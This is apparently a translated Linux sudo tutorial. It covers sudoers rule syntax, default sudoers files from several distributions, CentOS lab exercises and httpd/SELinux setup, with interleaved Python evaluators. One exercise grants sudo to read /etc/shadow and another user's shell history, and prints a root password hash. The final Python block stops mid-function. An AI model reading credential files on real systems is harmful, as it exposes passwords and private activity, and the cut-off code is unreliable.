Cmnd_Alias SHUTDOWN = /usr/sbin/shutdown

Cmnd_Alias HALT = /usr/sbin/halt

Cmnd_Alias REBOOT = /usr/sbin/reboot

Cmnd_Alias SHELLS = /usr/bin/sh, /usr/bin/csh, /usr/bin/ksh, \

/usr/local/bin/tcsh, /usr/bin/rsh, \

/usr/local/bin/zsh

Cmnd_Alias SU = /usr/bin/su

Cmnd_Alias PAGERS = /usr/bin/more, /usr/bin/pg, /usr/bin/less

 

User specification

 

The User specification is the part that actually determines who may run what.

 

root ALL = (ALL) ALL

%wheel ALL = (ALL) ALL

 

We let root and any user in group wheel run any command on any host as any user.

 

FULLTIMERS ALL = NOPASSWD: ALL

 

Full time sysadmins (millert, mikef, and dowdy) may run any command on any host

without authenticating themselves.

 

PARTTIMERS ALL = ALL

 

Part time sysadmins (bostley, jwfox, and crawl) may run any command on any host

but they must authenticate themselves first (since the entry lacks the NOPASSWD

tag).

 

jack CSNETS = ALL

 

The user jack may run any command on the machines in the CSNETS alias (the

networks 128.138.243.0, 128.138.204.0, and 128.138.242.0). Of those networks,

only 128.138.204.0 has an explicit netmask (in CIDR notation) indicating it is a

class C network. For the other networks in CSNETS, the local machine's netmask

will be used during matching.

 

lisa CUNETS = ALL

 

The user lisa may run any command on any host in the CUNETS alias (the class B

network 128.138.0.0).

 

operator ALL = DUMPS, KILL, SHUTDOWN, HALT, REBOOT, PRINTING,\

sudoedit /etc/printcap, /usr/oper/bin/

 

The operator user may run commands limited to simple maintenance. Here, those

are commands related to backups, killing processes, the printing system, shutting

down the system, and any commands in the directory /usr/oper/bin/.

 

joe ALL = /usr/bin/su operator

 

The user joe may only su(1) to operator.

 

pete HPPA = /usr/bin/passwd [A-Za-z]*, !/usr/bin/passwd root

 

%opers ALL = (: ADMINGRP) /usr/sbin/

 

Users in the opers group may run commands in /usr/sbin/ as themselves with any

group in the ADMINGRP Runas_Alias (the adm and oper groups).

 

The user pete is allowed to change anyone's password except for root on the HPPA

machines. Note that this assumes passwd(1) does not take multiple user names on

the command line.

 

bob SPARC = (OP) ALL : SGI = (OP) ALL

 

The user bob may run anything on the SPARC and SGI machines as any user listed in

the OP Runas_Alias (root and operator).

 

jim +biglab = ALL

 

The user jim may run any command on machines in the biglab netgroup. sudo knows

that "biglab" is a netgroup due to the '+' prefix.

 

+secretaries ALL = PRINTING, /usr/bin/adduser, /usr/bin/rmuser

 

Users in the secretaries netgroup need to help manage the printers as well as add

and remove users, so they are allowed to run those commands on all machines.

 

fred ALL = (DB) NOPASSWD: ALL

 

The user fred can run commands as any user in the DB Runas_Alias (oracle or

sybase) without giving a password.

 

john ALPHA = /usr/bin/su [!-]*, !/usr/bin/su *root*

 

On the ALPHA machines, user john may su to anyone except root but he is not

allowed to specify any options to the su(1) command.

 

jen ALL, !SERVERS = ALL

 

The user jen may run any command on any machine except for those in the SERVERS

Host_Alias (master, mail, www and ns).

 

jill SERVERS = /usr/bin/, !SU, !SHELLS

 

For any machine in the SERVERS Host_Alias, jill may run any commands in the

directory /usr/bin/ except for those commands belonging to the SU and SHELLS

Cmnd_Aliases.

 

steve CSNETS = (operator) /usr/local/op_commands/

 

The user steve may run any command in the directory /usr/local/op_commands/ but

only as user operator.

 

matt valkyrie = KILL

 

On his personal workstation, valkyrie, matt needs to be able to kill hung

processes.

 

WEBMASTERS www = (www) ALL, (root) /usr/bin/su www

 

On the host www, any user in the WEBMASTERS User_Alias (will, wendy, and wim),

may run any command as user www (which owns the web pages) or simply su(1) to

www.

 

ALL CDROM = NOPASSWD: /sbin/umount /CDROM,\

/sbin/mount -o nosuid\,nodev /dev/cd0a /CDROM

 

Any user may mount or unmount a CD-ROM on the machines in the CDROM Host_Alias

(orion, perseus, hercules) without entering a password. This is a bit tedious

for users to type, so it is a prime candidate for encapsulating in a shell

script.
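To make the matching rules in these examples concrete (aliases, `!` negation, last match wins, tags that persist along a list, fnmatch-style argument patterns), here is a small evaluator for the subset of the sudoers grammar shown above. It is an added example and not sudo's own parser; GROUPS and POLICY are constructed sample data, with the policy lines taken from the examples above (pete's host is written literally instead of through the HPPA alias).

```python
"""Minimal evaluator for the sudoers user-specification grammar described above.

Added example (not sudo's own parser, not part of the original post) covering only
the subset the quoted examples use: one-per-line aliases, `who host_list = (runas)
[NOPASSWD:|PASSWD:] cmnd, !cmnd, ...`, %group, ALL, '!' with last-match-wins, '/dir/'
and fnmatch argument patterns. No netgroups, IP/CIDR hosts, ':'-joined sections,
Defaults or runas groups. GROUPS and POLICY are constructed sample data."""
import fnmatch

GROUPS = {'wheel': {'root', 'mikef'}}            # constructed stand-in for /etc/group

def parse_sudoers(text):
    """-> (aliases, specs); specs = [(who, host_list, [(runas, tag, cmnd), ...])]."""
    aliases = {k: {} for k in ('User_Alias', 'Host_Alias', 'Runas_Alias', 'Cmnd_Alias')}
    specs = []
    for raw in text.replace('\\\n', ' ').splitlines():        # join continuation lines
        line = raw.split('#', 1)[0].strip()
        if not line or line.startswith('Defaults'):
            continue
        kind = line.split()[0]
        if kind in aliases:
            name, items = line[len(kind):].split('=', 1)
            aliases[kind][name.strip()] = [i.strip() for i in items.split(',')]
            continue
        who, rest = line.split(None, 1)
        host_list, cmnd_part = rest.split('=', 1)
        runas, tag, cmnds = 'root', 'PASSWD', []                # defaults until overridden
        for item in cmnd_part.split(','):
            item = item.strip()
            if item.startswith('('):                            # (user[:group]) Runas_Spec
                inner, item = item[1:].split(')', 1)
                runas, item = inner.split(':')[0].strip(), item.strip()
            for t in ('NOPASSWD:', 'PASSWD:'):                  # a tag persists along the list
                if item.startswith(t):
                    tag, item = t[:-1], item[len(t):].strip()
            cmnds.append((runas, tag, item))
        specs.append((who, host_list.strip(), cmnds))
    return aliases, specs

def expand(item, table):
    """Expand an alias name (possibly '!'-negated) into its leaf items."""
    neg, name = item.startswith('!'), item.lstrip('!')
    if name in table:
        return [('!' if neg else '') + leaf for sub in table[name] for leaf in expand(sub, table)]
    return [item]

def list_matches(items, table, pred):
    """Match a comma-separated sudoers list: '!' negates and the last match wins."""
    matched = False
    for item in items.split(','):
        for leaf in expand(item.strip(), table):
            if pred(leaf.lstrip('!')):
                matched = not leaf.startswith('!')
    return matched

def cmnd_matches(rule, command):
    """ALL, a directory ('/usr/bin/'), or a path whose argument pattern fnmatches the
    whole argument string; a rule without arguments allows any arguments."""
    if rule == 'ALL':
        return True
    rule_words, cmd_words = rule.split(), command.split()
    if rule_words[0].endswith('/'):
        return cmd_words[0].rpartition('/')[0] + '/' == rule_words[0]
    if rule_words[0] != cmd_words[0] or len(rule_words) == 1:
        return rule_words[0] == cmd_words[0]
    rule_args, user_args = ' '.join(rule_words[1:]), ' '.join(cmd_words[1:])
    return user_args == '' if rule_args == '""' else fnmatch.fnmatchcase(user_args, rule_args)

def check(sudoers, user, host, command, runas='root'):
    """'NOPASSWD', 'PASSWD' or None (denied); entries are scanned in order, last match wins."""
    aliases, specs = sudoers
    result = None
    for who, host_list, cmnds in specs:
        if not list_matches(who, aliases['User_Alias'], lambda w: w in ('ALL', user) or
                            (w.startswith('%') and user in GROUPS.get(w[1:], ()))):
            continue
        if not list_matches(host_list, aliases['Host_Alias'], lambda h: h in ('ALL', host)):
            continue
        for runas_spec, tag, item in cmnds:       # empty runas part "(: GRP)" = invoking user
            if not list_matches(runas_spec or user, aliases['Runas_Alias'],
                                lambda r: r in ('ALL', runas)):
                continue
            for leaf in expand(item, aliases['Cmnd_Alias']):
                if cmnd_matches(leaf.lstrip('!'), command):
                    result = None if leaf.startswith('!') else tag
    return result

POLICY = parse_sudoers("""
User_Alias WEBMASTERS = will, wendy, wim
Host_Alias SERVERS = master, mail, www, ns
Cmnd_Alias SU = /usr/bin/su
Cmnd_Alias SHELLS = /usr/bin/sh, /usr/bin/csh, /usr/bin/ksh
%wheel ALL = (ALL) ALL
ray rushmore = NOPASSWD: /bin/kill, PASSWD: /bin/ls, /usr/bin/lprm
pete boa = /usr/bin/passwd [A-Za-z]*, !/usr/bin/passwd root
jen ALL, !SERVERS = ALL
jill SERVERS = /usr/bin/, !SU, !SHELLS
WEBMASTERS www = (www) ALL, (root) /usr/bin/su www
""")
```

`check(POLICY, 'pete', 'boa', '/usr/bin/passwd root')` returns None because the later `!/usr/bin/passwd root` entry overrides the earlier wildcard grant, while `check(POLICY, 'jill', 'mail', '/usr/bin/sh')` is denied through the negated SHELLS alias even though `/usr/bin/` matched first.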

 

 

 

(2) Linux Distribution : /etc/sudoers file example

 

(KaliLinux 1.1.0) /etc/sudoers file example

#

# This file MUST be edited with the 'visudo' command as root.

#

# Please consider adding local content in /etc/sudoers.d/ instead of

# directly modifying this file.

#

# See the man page for details on how to write a sudoers file.

#

Defaults env_reset

Resets the default environment variables.

Defaults mail_badpass

If the password is not entered correctly, a mail notification is sent.

Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

Specifies the PATH variable used for every command run through sudo.

 

# Host alias specification

 

# User alias specification

 

# Cmnd alias specification

 

# User privilege specification

root ALL=(ALL:ALL) ALL

The root user can run every command on the system through sudo.

# Allow members of group sudo to execute any command

%sudo ALL=(ALL:ALL) ALL

Users in the sudo group can run every command on the system through sudo.

# See sudoers(5) for more information on "#include" directives:

 

#includedir /etc/sudoers.d

 

 

(centos 5.9) /etc/sudoers file example

## Sudoers allows particular users to run various commands as

## the root user, without needing the root password.

##

## Examples are provided at the bottom of the file for collections

## of related commands, which can then be delegated out to particular

## users or groups.

##

## This file must be edited with the 'visudo' command.

 

## Host Aliases

## Groups of machines. You may prefer to use hostnames (perhap using

## wildcards for entire domains) or IP addresses instead.

# Host_Alias FILESERVERS = fs1, fs2

# Host_Alias MAILSERVERS = smtp, smtp2

Host alias declaration section

 

## User Aliases

## These aren't often necessary, as you can use regular groups

## (ie, from files, LDAP, NIS, etc) in this file - just use %groupname

## rather than USERALIAS

# User_Alias ADMINS = jsmith, mikem

User alias declaration section

 

## Command Aliases

## These are groups of related commands...

 

## Networking

#Cmnd_Alias NETWORKING = /sbin/route, /sbin/ifconfig, /bin/ping, /sbin/dhclient, /usr/bin/net, /sbin/iptables, /usr/bin/rfcomm, /usr/bin/wvdial, /sbin/iwconfig, /sbin/mii-tool

Command alias declaration section

 

## Installation and management of software

#Cmnd_Alias SOFTWARE = /bin/rpm, /usr/bin/up2date, /usr/bin/yum

Command alias declaration section

 

## Services

#Cmnd_Alias SERVICES = /sbin/service, /sbin/chkconfig

Command alias declaration section

 

## Updating the locate database

#Cmnd_Alias LOCATE = /usr/bin/updatedb

Command alias declaration section

 

## Storage

#Cmnd_Alias STORAGE = /sbin/fdisk, /sbin/sfdisk, /sbin/parted, /sbin/partprobe, /bin/mount, /bin/umount

Command alias declaration section

 

## Delegating permissions

#Cmnd_Alias DELEGATING = /usr/sbin/visudo, /bin/chown, /bin/chmod, /bin/chgrp

Command alias declaration section

 

## Processes

#Cmnd_Alias PROCESSES = /bin/nice, /bin/kill, /usr/bin/kill, /usr/bin/killall

Command alias declaration section

 

## Drivers

#Cmnd_Alias DRIVERS = /sbin/modprobe

Command alias declaration section

 

# Defaults specification

 

#

# Disable "ssh hostname sudo <cmd>", because it will show the password in clear.

# You have to run "ssh -t hostname sudo <cmd>".

#

Defaults requiretty

Requires a tty when running sudo.

(X) # ssh 172.16.9.252 sudo CMD

(O) # ssh -t 172.16.9.252 sudo CMD

#

# Refuse to run if unable to disable echo on the tty. This setting should also be

# changed in order to be able to use sudo without a tty. See requiretty above.

#

Defaults !visiblepw

Password input is not echoed on the tty (sudo refuses to run if it cannot disable echo).

Defaults env_reset

Resets the environment to a minimal default set of variables.

Defaults env_keep = "COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR \

LS_COLORS MAIL PS1 PS2 QTDIR USERNAME \

LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION \

LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC \

LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS \

_XKB_CHARSET XAUTHORITY"

Keeps the listed variables from the invoking user's environment, instead of redefining them, when a command is run through sudo.

 

## Next comes the main part: which users can run what software on

## which machines (the sudoers file can be shared between multiple

## systems).

## Syntax:

##

## user MACHINE=COMMANDS

##

## The COMMANDS section may have other options added to it.

##

## Allow root to run any commands anywhere

root ALL=(ALL) ALL

The root user may run any command on the system through sudo.

 

## Allows members of the 'sys' group to run networking, software,

## service management apps and more.

# %sys ALL = NETWORKING, SOFTWARE, SERVICES, STORAGE, DELEGATING, PROCESSES, LOCATE, DRIVERS

 

## Allows people in group wheel to run all commands

# %wheel ALL=(ALL) ALL

Users in the wheel group may run any command on the system through sudo.

 

## Same thing without a password

# %wheel ALL=(ALL) NOPASSWD: ALL

Users in the wheel group are not asked for a password when using sudo.

 

## Allows members of the users group to mount and unmount the

## cdrom as root

# %users ALL=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom

Users in the users group may run "# mount /mnt/cdrom" (and the matching umount).

 

## Allows members of the users group to shutdown this system

# %users localhost=/sbin/shutdown -h now

Users in the users group may run "shutdown -h now".

 

 

(CentOS 6.5) /etc/sudoers file example

## Sudoers allows particular users to run various commands as

## the root user, without needing the root password.

##

## Examples are provided at the bottom of the file for collections

## of related commands, which can then be delegated out to particular

## users or groups.

##

## This file must be edited with the 'visudo' command.

 

## Host Aliases

## Groups of machines. You may prefer to use hostnames (perhaps using

## wildcards for entire domains) or IP addresses instead.

# Host_Alias FILESERVERS = fs1, fs2

# Host_Alias MAILSERVERS = smtp, smtp2

Host alias declaration

 

## User Aliases

## These aren't often necessary, as you can use regular groups

## (ie, from files, LDAP, NIS, etc) in this file - just use %groupname

## rather than USERALIAS

# User_Alias ADMINS = jsmith, mikem

User alias declaration

 

## Command Aliases

## These are groups of related commands...

Command alias declaration

 

## Networking

# Cmnd_Alias NETWORKING = /sbin/route, /sbin/ifconfig, /bin/ping, /sbin/dhclient, /usr/bin/net, /sbin/iptables, /usr/bin/rfcomm, /usr/bin/wvdial, /sbin/iwconfig, /sbin/mii-tool

Command alias declaration

 

## Installation and management of software

# Cmnd_Alias SOFTWARE = /bin/rpm, /usr/bin/up2date, /usr/bin/yum

Command alias declaration

 

## Services

# Cmnd_Alias SERVICES = /sbin/service, /sbin/chkconfig

Command alias declaration

 

## Updating the locate database

# Cmnd_Alias LOCATE = /usr/bin/updatedb

Command alias declaration

 

## Storage

# Cmnd_Alias STORAGE = /sbin/fdisk, /sbin/sfdisk, /sbin/parted, /sbin/partprobe, /bin/mount, /bin/umount

Command alias declaration

 

## Delegating permissions

# Cmnd_Alias DELEGATING = /usr/sbin/visudo, /bin/chown, /bin/chmod, /bin/chgrp

Command alias declaration

 

## Processes

# Cmnd_Alias PROCESSES = /bin/nice, /bin/kill, /usr/bin/kill, /usr/bin/killall

Command alias declaration

 

## Drivers

# Cmnd_Alias DRIVERS = /sbin/modprobe

Command alias declaration

 

# Defaults specification

 

#

# Disable "ssh hostname sudo <cmd>", because it will show the password in clear.

# You have to run "ssh -t hostname sudo <cmd>".

#

Defaults requiretty

Requires a tty when running sudo.

(X) # ssh 172.16.9.252 sudo CMD

(O) # ssh -t 172.16.9.252 sudo CMD

#

# Refuse to run if unable to disable echo on the tty. This setting should also be

# changed in order to be able to use sudo without a tty. See requiretty above.

#

Defaults !visiblepw

Password input is not echoed on the tty (sudo refuses to run if it cannot disable echo).

 

#

# Preserving HOME has security implications since many programs

# use it when searching for configuration files. Note that HOME

# is already set when the the env_reset option is enabled, so

# this option is only effective for configurations where either

# env_reset is disabled or HOME is present in the env_keep list.

#

Defaults always_set_home

Sets the HOME variable (to the target user's home directory).

 

Defaults env_reset

Resets the environment to a minimal default set of variables.

Defaults env_keep = "COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS"

Defaults env_keep += "MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE"

Defaults env_keep += "LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES"

Defaults env_keep += "LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE"

Defaults env_keep += "LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"

Keeps the listed variables from the invoking user's environment, instead of redefining them, when a command is run through sudo.

 

#

# Adding HOME to env_keep may enable a user to run unrestricted

# commands via sudo.

#

# Defaults env_keep += "HOME"

 

Defaults secure_path = /sbin:/bin:/usr/sbin:/usr/bin

Sets the PATH used for every command run through sudo.

 

## Next comes the main part: which users can run what software on

## which machines (the sudoers file can be shared between multiple

## systems).

## Syntax:

##

## user MACHINE=COMMANDS

##

## The COMMANDS section may have other options added to it.

##

## Allow root to run any commands anywhere

root ALL=(ALL) ALL

The root user may run any command on the system through sudo.

 

## Allows members of the 'sys' group to run networking, software,

## service management apps and more.

# %sys ALL = NETWORKING, SOFTWARE, SERVICES, STORAGE, DELEGATING, PROCESSES, LOCATE, DRIVERS

 

## Allows people in group wheel to run all commands

# %wheel ALL=(ALL) ALL

Users in the wheel group may run any command on the system through sudo.

 

## Same thing without a password

# %wheel ALL=(ALL) NOPASSWD: ALL

Users in the wheel group may run any command without entering a password.

 

## Allows members of the users group to mount and unmount the

## cdrom as root

# %users ALL=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom

Users in the users group may run "# mount /mnt/cdrom" (and the matching umount).

 

## Allows members of the users group to shutdown this system

# %users localhost=/sbin/shutdown -h now

Users in the users group may run "# shutdown -h now" on localhost.

 

## Read drop-in files from /etc/sudoers.d (the # here does not mean a comment)

#includedir /etc/sudoers.d

 

 

(Ubuntu 8.04) /etc/sudoers file example

# /etc/sudoers

#

# This file MUST be edited with the 'visudo' command as root.

#

# See the man page for details on how to write a sudoers file.

#

 

Defaults env_reset

Resets the environment to a minimal default set of variables.

 

# Uncomment to allow members of group sudo to not need a password

# %sudo ALL=NOPASSWD: ALL

When uncommented, users in the sudo group may run any command on the system without entering a password.

 

# Host alias specification

 

# User alias specification

 

# Cmnd alias specification

 

# User privilege specification

root ALL=(ALL) ALL

The root user may run any command on the system through sudo.

 

# Members of the admin group may gain root privileges

%admin ALL=(ALL) ALL

Users in the admin group may run any command on the system through sudo.

 

 

3. sudo hands-on exercises

 

(Note) Precautions for the exercises

The exercises were run on CentOS 5.9. The /etc/sudoers file differs between versions, so be sure to check the settings for your own version.

The default /etc/sudoers also differs between Linux distributions, so be sure to check the settings for your own distribution and version.

 

 

System used

- CentOS 5.9

 

 

[Exercise 1]

Goal: create a user with the same level of privilege as the administrator (e.g. root).

 

(Prerequisites)

Users user01 through user03 must exist.

Add them with commands of the following form:

# useradd user01

# echo user01 | passwd --stdin user01

 

Edit the /etc/sudoers file

# visudo (# vi /etc/sudoers -> :wq!)

..... (omitted) .....

## Same thing without a password

# %wheel ALL=(ALL) NOPASSWD: ALL

 

## Allows members of the users group to mount and unmount the

## cdrom as root

# %users ALL=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom

 

## Allows members of the users group to shutdown this system

# %users localhost=/sbin/shutdown -h now

 

#

# (1) Specific configuration

#

user01 ALL=(ALL) ALL

-> Add the line above at the bottom of the /etc/sudoers file.

 

Test by logging in as user01

# ssh user01@localhost

Log in as user01

 

$ sudo /sbin/shutdown +3 -h

[sudo] password for user01: (user01)

 

Broadcast message from root (pts/3) (Mon Sep 21 15:41:07 2015):

 

The system is going DOWN for system halt in 3 minutes!

 

Broadcast message from root (pts/3) (Mon Sep 21 15:41:07 2015):

 

The system is going DOWN for system halt in 3 minutes!

<CTRL + C>

Shutdown cancelled.

-> user01 can run shutdown, a command normally reserved for the administrator.

-> In the exercise, press <CTRL + C> instead of actually rebooting the system.

 

$ exit

#

 

 

 

 

 

 

 

[Exercise 2]

Goal: change the configuration so that user01 can run system commands through sudo without entering a password.

 

Edit the /etc/sudoers file

# visudo (# vi /etc/sudoers -> :wq!)

..... (omitted) .....

#

# (1) Specific configuration

#

[Before]

user01 ALL=(ALL) ALL

[After]

user01 ALL=(ALL) NOPASSWD:ALL

-> Insert the NOPASSWD tag into the existing line.

 

Test by logging in as user01

# ssh user01@localhost

Log in as user01

 

$ sudo /sbin/shutdown +3 -h

Broadcast message from root (pts/3) (Mon Sep 21 15:49:56 2015):

 

The system is going DOWN for system halt in 3 minutes!

 

Broadcast message from root (pts/3) (Mon Sep 21 15:49:56 2015):

 

The system is going DOWN for system halt in 3 minutes!

<CTRL + C>

Shutdown cancelled.

-> No password prompt appears.

$ exit

#

 

 

[Exercise 3]

Goal: configure a user who can access a file that ordinary users cannot access (e.g. /etc/shadow).

$ cat /etc/shadow

cat: /etc/shadow: Permission denied

 

Edit the /etc/sudoers file

# visudo

..... (omitted) .....

#

# (1) Specific configuration

#

user01 ALL=(ALL) NOPASSWD:ALL

user02 ALL=/bin/cat /etc/shadow, /bin/cat /home/user01/.bash_history

-> Add the lines above at the bottom of the /etc/sudoers file.

 

Test by logging in as user02

$ ssh user02@localhost

Log in as user02

 

$ cat /etc/shadow

cat: /etc/shadow: Permission denied

 

$ cat /home/user01/.bash_history

cat: /home/user01/.bash_history: Permission denied

 

$ sudo cat /etc/shadow

We trust you have received the usual lecture from the local System

Administrator. It usually boils down to these three things:

 

#1) Respect the privacy of others.

#2) Think before you type.

#3) With great power comes great responsibility.

 

[sudo] password for user02: (user02)

root:$1$gRjk/iMP$rRLfVhiUKZLNkY/VjPLcg/:16799:0:99999:7:::

bin:*:16678:0:99999:7:::

daemon:*:16678:0:99999:7:::

adm:*:16678:0:99999:7:::

lp:*:16678:0:99999:7:::

sync:*:16678:0:99999:7:::

shutdown:*:16678:0:99999:7:::

..... (omitted) .....

-> The command runs as expected.

 

$ sudo cat /home/user01/.bash_history

..... (omitted) .....

sudo /sbin/shutdown +3 -h

#1442818248

exit

#1442818431

cat /proc/sys/net/ipv4/ip_forward

#1442818438

exit

-> The command runs as expected.

 

$ exit

#

 

 

 

 

 

[Exercise 4]

Goal: allow a user to operate a service script (e.g. /etc/init.d/sshd) through sudo.

 

Edit the /etc/sudoers file

# visudo

..... (omitted) .....

#

# (1) Specific configuration

#

user01 ALL=(ALL) NOPASSWD:ALL

user02 ALL=/bin/cat /etc/shadow, /bin/cat /home/user01/.bash_history

user03 ALL=/etc/init.d/sshd

 

Test by logging in as user03

# telnet localhost

Log in as user03

 

$ /etc/init.d/sshd restart

rm: cannot remove `/var/run/sshd.pid': Permission denied [FAILED]

 

cp: cannot remove `/var/empty/sshd/etc/localtime': Permission denied

Starting sshd: /etc/ssh/sshd_config: Permission denied

[FAILED]

 

$ sudo /etc/init.d/sshd restart

We trust you have received the usual lecture from the local System

Administrator. It usually boils down to these three things:

 

#1) Respect the privacy of others.

#2) Think before you type.

#3) With great power comes great responsibility.

 

[sudo] password for user03: (user03)

Stopping sshd: [ OK ]

Starting sshd: [ OK ]

 

$ exit

#
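The man page entries quoted earlier (WEBMASTERS, the CDROM Host_Alias) and the lab rules for user01, user02 and user03 all follow the same user-spec grammar. As an added example, not code from this page or from the sudo project, here is a small Python evaluator for that subset (User_/Host_/Cmnd_Alias, %group, (runas), NOPASSWD/PASSWD, ALL; no line continuations or escaped commas). SAMPLE_SUDOERS is constructed from rules on this page, and the function names are my own.

```python
import re
# Constructed sudoers excerpt assembled from rules on this page; not a real /etc/sudoers.
SAMPLE_SUDOERS = """
User_Alias WEBMASTERS = will, wendy, wim
Host_Alias CDROM = orion, perseus, hercules
Defaults requiretty
%wheel ALL=(ALL) ALL
WEBMASTERS www = (www) ALL, (root) /usr/bin/su www
ALL CDROM = NOPASSWD: /sbin/umount /CDROM
user01 ALL=(ALL) NOPASSWD:ALL
user02 ALL=/bin/cat /etc/shadow, /bin/cat /home/user01/.bash_history
user03 ALL=/etc/init.d/sshd
"""

def _expand(name, kind, aliases):
    """Recursively expand a User_/Host_/Cmnd_Alias name into its member set."""
    if name not in aliases[kind]:
        return {name}
    return set().union(*(_expand(m, kind, aliases) for m in aliases[kind][name]))

def parse_sudoers(text):
    """Parse aliases and user specs into (aliases, entries); no line continuations."""
    aliases, entries = {"User_Alias": {}, "Host_Alias": {}, "Cmnd_Alias": {}}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] == "#" or line.startswith("Defaults"):
            continue
        kind = line.split()[0]
        if kind in aliases:
            name, members = line[len(kind):].split("=", 1)
            aliases[kind][name.strip()] = [m.strip() for m in members.split(",")]
            continue
        lhs, rhs = line.split("=", 1)
        who, host = lhs.split()                 # e.g. "user02 ALL" or "WEBMASTERS www"
        runas, nopasswd = "root", False         # until a (runas) or a tag changes them
        for item in (i.strip() for i in rhs.split(",")):
            m = re.match(r"\((\w+)(?::\w+)?\)\s*", item)   # (user) or (user:group)
            if m:
                runas, item = m.group(1), item[m.end():]
            m = re.match(r"(NOPASSWD|PASSWD):\s*", item)
            if m:
                nopasswd, item = m.group(1) == "NOPASSWD", item[m.end():]
            for cmd in _expand(item, "Cmnd_Alias", aliases):
                entries.append((who, host, runas, nopasswd, cmd))  # one entry per command
    return aliases, entries

def may_run(aliases, entries, user, groups, host, cmd, runas="root"):
    """Return (allowed, nopasswd) for user running cmd as runas on host; last match wins."""
    result = (False, False)
    for who, h, r, nopw, c in entries:
        users = _expand(who, "User_Alias", aliases)
        hosts = _expand(h, "Host_Alias", aliases)
        if not ("ALL" in users or user in users or any("%" + g in users for g in groups)):
            continue
        if not ("ALL" in hosts or host in hosts) or r not in ("ALL", runas):
            continue
        # a rule listing no arguments allows any arguments; with arguments it must match exactly
        if c == "ALL" or c == cmd or (" " not in c and cmd.split()[0] == c):
            result = (True, nopw)
    return result
```

The argument rule is what makes Exercise 4 work: `user03 ALL=/etc/init.d/sshd` lists no arguments, so `sudo /etc/init.d/sshd restart` is allowed, while user02's `/bin/cat /etc/shadow` must be typed exactly.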





(Summary) Example: web service (httpd, /etc/httpd/conf/httpd.conf, 80)

Daemon: /usr/sbin/httpd

Main configuration file: /etc/httpd/conf/httpd.conf

Service port: 80

Web directory: /var/www/html

 

 

 

"Service opening procedure" to follow when opening a new service (e.g. FTP)

() Install the software

# yum -y install httpd httpd-tools

 

() Turn the service on

# chkconfig httpd on

# service httpd start

 

() Register the service in the firewall

# iptables -A INPUT -m state --state NEW -p tcp --dport 80 -j ACCEPT

# service iptables save /* /etc/sysconfig/iptables */

 

() Configure SELinux

(Service booleans)

# getsebool -a | grep httpd

-> check the audit messages (look for AVC denied messages)

-> turn on the appropriate boolean

(EX) # setsebool httpd_enable_homedirs on

# setsebool -P httpd_enable_homedirs on

 

(Files the service daemon reads)

-> check the audit messages (look for AVC denied messages)

(EX) # mv /home/user01/index.html /var/www/html

# chcon -t httpd_sys_content_t /var/www/html/index.html

# semanage fcontext -a -t httpd_sys_content_t /var/www/html/index.html
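The SELinux step above says to read the AVC denied messages and then either switch on a boolean or relabel the files the daemon reads; in the page's own scenario the file was moved with mv, which keeps its old user_home_t label, so httpd_t is denied until chcon/semanage relabel it. As an added example, not code from this page, here is a Python parser for AVC records that applies that decision; the audit lines are constructed, and the function names are my own.

```python
import re

# Constructed audit.log records for the page's scenario (index.html moved from a home
# directory into /var/www/html, still labelled user_home_t); not real output.
SAMPLE_AUDIT = """\
type=AVC msg=audit(1442818248.101:301): avc:  denied  { read } for  pid=2104 comm="httpd" name="index.html" dev=dm-0 ino=131 scontext=unconfined_u:system_r:httpd_t:s0 tcontext=unconfined_u:object_r:user_home_t:s0 tclass=file
type=AVC msg=audit(1442818249.202:302): avc:  denied  { getattr } for  pid=2104 comm="httpd" path="/var/www/html/index.html" dev=dm-0 ino=131 scontext=unconfined_u:system_r:httpd_t:s0 tcontext=unconfined_u:object_r:user_home_t:s0 tclass=file
type=AVC msg=audit(1442818250.303:303): avc:  denied  { name_connect } for  pid=2104 comm="httpd" dest=3306 scontext=unconfined_u:system_r:httpd_t:s0 tcontext=system_u:object_r:mysqld_port_t:s0 tclass=tcp_socket
type=SYSCALL msg=audit(1442818249.202:302): arch=c000003e syscall=4 success=no exit=-13
"""

AVC_RE = re.compile(r"type=AVC msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): avc:\s+"
                    r"(?P<verdict>denied|granted)\s+\{ (?P<perms>[^}]+) \} for\s+(?P<rest>.*)")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_avc(line):
    """Parse one AVC record into a dict; returns None for non-AVC lines."""
    m = AVC_RE.match(line)
    if not m:
        return None
    rec = {"ts": float(m["ts"]), "serial": int(m["serial"]),
           "verdict": m["verdict"], "perms": m["perms"].split()}
    for key, val in KV_RE.findall(m["rest"]):
        rec[key] = val.strip('"')
    # contexts are user:role:type:level; the type is what policy rules are written against
    rec["stype"] = rec["scontext"].split(":")[2]
    rec["ttype"] = rec["tcontext"].split(":")[2]
    return rec

def classify(rec, domain, content_type):
    """Map a denial from `domain` onto the two remedies in the procedure above:
    a mislabelled file (chcon/semanage) or a policy boolean (getsebool/setsebool)."""
    if rec is None or rec["verdict"] != "denied" or rec["stype"] != domain:
        return None
    if rec["tclass"] in ("file", "dir") and rec["ttype"] != content_type:
        target = rec.get("path") or rec.get("name")   # name= is only the basename
        return ("file_context", f"chcon -t {content_type} {target}; "
                                f"semanage fcontext -a -t {content_type} {target}")
    perms = " ".join(rec["perms"])
    return ("boolean", f"getsebool -a | grep {domain.rsplit('_', 1)[0]}"
                       f"  # look for a boolean covering {{ {perms} }} on {rec['tclass']}")

def scan(log_text, domain, content_type):
    """Return (serial, kind, suggestion) for every relevant denial in the log text."""
    out = []
    for line in log_text.splitlines():
        rec = parse_avc(line)
        hit = classify(rec, domain, content_type)
        if hit:
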